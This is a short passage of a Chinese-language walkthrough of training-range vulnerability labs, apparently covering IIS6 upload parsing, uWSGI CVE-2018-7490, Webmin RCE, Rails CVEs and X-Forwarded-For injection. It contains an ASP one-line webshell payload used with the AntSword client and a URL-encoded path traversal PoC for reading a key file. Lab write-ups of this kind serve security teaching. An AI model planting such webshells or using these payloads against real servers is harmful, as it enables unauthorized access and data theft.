文章目录 一、内部文件上传系统漏洞分析溯源 过程 原理 二、uWSGI 漏洞复现(CVE-2018-7490) 过程 原理 三、Webmin未经身份验证的远程代码执行 过程 原理 四、Ruby On Rails漏洞复现第一题(CVE-2018-3760) 过程 原理 五、Ruby On Rails漏洞复现第二题(CVE-2019-5418) 过程 原理 六、X-Forwarded-For注入漏洞实战 过程 原理 一、内部文件上传系统漏洞分析溯源 过程 1.访问靶场 2.准备asp一句话木马 <%eval request("MH")%> 3.上传asp.txt,抓包,修改参数 4.放包,蚁剑连接 原理 IIS6.0目录解析: 以*.asp命名的文件夹下,里面的文件都将会被当成ASP文件执行 二、uWSGI 漏洞复现(CVE-2018-7490) 过程 1.访问靶场 2.poc /..%2F..%2F..%2F..%2F..%2Fkey.txt 原理